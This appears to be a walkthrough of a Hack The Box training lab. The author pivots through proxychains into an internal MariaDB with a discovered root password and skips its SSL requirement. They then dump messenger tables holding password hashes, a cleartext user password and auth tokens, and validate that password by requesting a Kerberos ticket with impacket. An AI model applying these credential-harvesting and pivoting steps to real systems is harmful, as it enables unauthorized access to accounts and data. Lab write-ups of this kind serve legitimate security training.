Output Messenger DB
There is a MySQL instance running on the port 14406
The DB credential has been identified
┌──(kali㉿kali)-[~/…/htb/labs/infiltrator/Output_Messenger]
└─$ proxychains4 -q mysql --host=localhost --port=14406 --user=root --password=ibWijteig5
ERROR 2026 (HY000): TLS/SSL error: SSL is required, but the server does not support itIt would appear that the target MySQL instance is configured to run in SSL
┌──(kali㉿kali)-[~/…/htb/labs/infiltrator/Output_Messenger]
└─$ proxychains4 -q mysql --host=localhost --port=14406 --user=root --password=ibWijteig5 --skip-ssl
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 20
Server version: 10.1.19-MariaDB mariadb.org binary distribution
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Support MariaDB developers by giving a star at https://github.com/MariaDB/server
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> Authenticated.
Ignoring SSL policy with the --skip-ssl flag.
MariaDB [(none)]> SHOW GRANTS FOR CURRENT_USER;
+----------------------------------------------------------------------------------------------------------------------------------------+
| Grants for root@localhost |
+----------------------------------------------------------------------------------------------------------------------------------------+
| GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' IDENTIFIED BY PASSWORD '*5231D85B94E33260842B2EBB25BDF6B11B314C09' WITH GRANT OPTION |
| GRANT PROXY ON ''@'%' TO 'root'@'localhost' WITH GRANT OPTION |
+----------------------------------------------------------------------------------------------------------------------------------------+
2 rows in set (0.022 sec)The current user has All Privileges
pwned here already as I could read any file on the dc01.infiltrator.htb host
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| outputwall |
| performance_schema |
+--------------------+
4 rows in set (0.024 sec)
MariaDB [(none)]> use outputwall;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changedoutputwall
MariaDB [outputwall]> show tables;
+---------------------------+
| Tables_in_outputwall |
+---------------------------+
| ot_attachment |
| ot_comments |
| ot_entity |
| ot_entity_accounts |
| ot_entity_daysoff |
| ot_entity_setting |
| ot_sessions |
| ot_user_notification_read |
| ot_user_notifications |
| ot_wall_activity |
| ot_wall_favorite |
| ot_wall_notification |
| ot_wall_posts |
| ot_wall_tagmessages |
| ot_wall_tags |
| ot_wall_tokens |
| ot_wall_usermessages |
+---------------------------+
17 rows in set (0.021 sec)Entity Accounts
MariaDB [outputwall]> show ot_entity_accounts;
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'ot_entity_accounts' at line 1
MariaDB [outputwall]> select * from ot_entity_accounts;
+-----------+--------------+---------------------------------------+-----------+---------------------+---------------------+------------------------------------------+-----------+-----------+---------------------+-----------+------+-------------+---------+------+
| entity_id | company_name | domain_url | user_name | register_date | email | password | db_string | is_active | exp_date | max_users | plan | license_key | gdomain | type |
+-----------+--------------+---------------------------------------+-----------+---------------------+---------------------+------------------------------------------+-----------+-----------+---------------------+-----------+------+-------------+---------+------+
| 1 | Demo | 10.10.10.10:14126,105.69.247.2
:14126 | admin | 2014-10-18 10:46:30 | demo@outputtime.com | 38f078a81a2b033d197497af5b77f95b50bfcfb8 | | 1 | 2031-10-29 06:23:42 | 0 | T | | | |
+-----------+--------------+---------------------------------------+-----------+---------------------+---------------------+------------------------------------------+-----------+-----------+---------------------+-----------+------+-------------+---------+------+
1 row in set (0.021 sec)38f078a81a2b033d197497af5b77f95b50bfcfb8
hashcat was unable to crack the hash
Posts
MariaDB [outputwall]> select * from ot_wall_posts;
+---------+-----------+------------+---------+---------+-----------+--------------------------------------------------------------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-----------+----------+------------+-------+-----------+-----+-----------------+----------------+
| post_id | entity_id | post_date | post_by | post_to | post_type | post_subject | post_message | post_content | post_input | followers | unfollow | like_count | liked | ack_count | ack | keep_ontop_till | comments_count |
+---------+-----------+------------+---------+---------+-----------+--------------------------------------------------------------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-----------+----------+------------+-------+-----------+-----+-----------------+----------------+
| 1 | 1 | 1708532113 | 7 | | M | UserExplorer app project | Hey team, I'm here! In this screenshot, I'll guide you through using the app UserExplorer.exe. It works seamlessly with dev credentials, but remember, it's versatile and functions with any credentials. Currently, we're exploring the default option. Stay tuned for more updates!
"UserExplorer.exe -u m.harris -p D3v3l0p3r_Pass@1337! -s M.harris" | | | ,7,9, | | 2 | ,9,1, | 0 | | 0 | 1 |
| 2 | 1 | 1708532650 | 9 | | M | Security Alert! Pre-Auth Disabled on kerberos for Some Users | Hey team,
We've identified a security concern: some users and our domain (dc01.infiltrator.htb) have pre-authentication disabled on kerberos.
No need to panic! Our vigilant team is already on it and will work diligently to fix this. In the meantime, stay vigilant and be cautious about any potential security risks. | | | ,9, | | 1 | ,1, | 0 | | 0 | 0 |
+---------+-----------+------------+---------+---------+-----------+--------------------------------------------------------------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-----------+----------+------------+-------+-----------+-----+-----------------+----------------+
2 rows in set (0.022 sec)The ot_wall_posts table contains a post with a CLEARTEXT credential of the m.harris user; D3v3l0p3r_Pass@1337!
Validation
┌──(kali㉿kali)-[~/archive/htb/labs/infiltrator]
└─$ impacket-getTGT INFILTRATOR.HTB/m.harris@dc01.infiltrator.htb -dc-ip $IP
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Password: D3v3l0p3r_Pass@1337!
[*] Saving ticket in m.harris@dc01.infiltrator.htb.ccacheSuccessfully Validated
TGT re-generated for the m.harris user
Attachment
MariaDB [outputwall]> select * from ot_attachment;
+---------------+-----------+-----------+---------------+-------------+-----------+--------------------------------------+-----------+-------+---------------+---------------------+---------+-----------+---------------------+
| attachment_id | entity_id | file_type | file_name | module_type | module_id | file_path | file_size | title | checkedout_by | checkedout_date | version | posted_by | posted_date |
+---------------+-----------+-----------+---------------+-------------+-----------+--------------------------------------+-----------+-------+---------------+---------------------+---------+-----------+---------------------+
| 1 | 1 | png | SS_1657239581 | O | 1 | 7c96d28148f90cc4bdf1168f57a13fe9.png | 13799.000 | | 0 | 0000-00-00 00:00:00 | 0 | 7 | 2024-02-21 16:15:13 |
+---------------+-----------+-----------+---------------+-------------+-----------+--------------------------------------+-----------+-------+---------------+---------------------+---------+-----------+---------------------+
1 row in set (0.022 sec)Auth Token
MariaDB [outputwall]> select * from ot_wall_tokens;
+----------+---------+------------+---------------------------+-----------+-----------+-------------------------------------------------------------------------------+---------------------+
| token_id | user_id | first_name | email | user_role | entity_id | auth_token | expiry_date |
+----------+---------+------------+---------------------------+-----------+-----------+-------------------------------------------------------------------------------+---------------------+
| 1 | 7 | K.turner | turner@infiltrator.htb | U | 1 | iX9Z\/yslevNIY0R6aKNzBebgT_KpW4BlaGHjWS1zpd5QcmaRx8UGwBvaMxy3Q3Wb2E5XhI9lpIo= | 2024-02-22 00:00:00 |
| 7 | 9 | winrm_svc | winrm_svc@infiltrator.htb | U | 1 | iX9Z\/yslevMmHLWW_pvaVChN6kbwB_cbGHvAA75yee65xBQMd20Dgmf2iXD18Oq9hiwcgIfB1uo= | 2024-02-26 00:00:00 |
| 16 | 1 | Admin | | A | 1 | iX9Z\/yslevMJZgSfyKCEdHJE3RjYRSAMORYGfFRYTag9N3WBn20KJi_aWmmymhdJ | 2024-09-03 00:00:00 |
+----------+---------+------------+---------------------------+-----------+-----------+-------------------------------------------------------------------------------+---------------------+
3 rows in set (0.021 sec)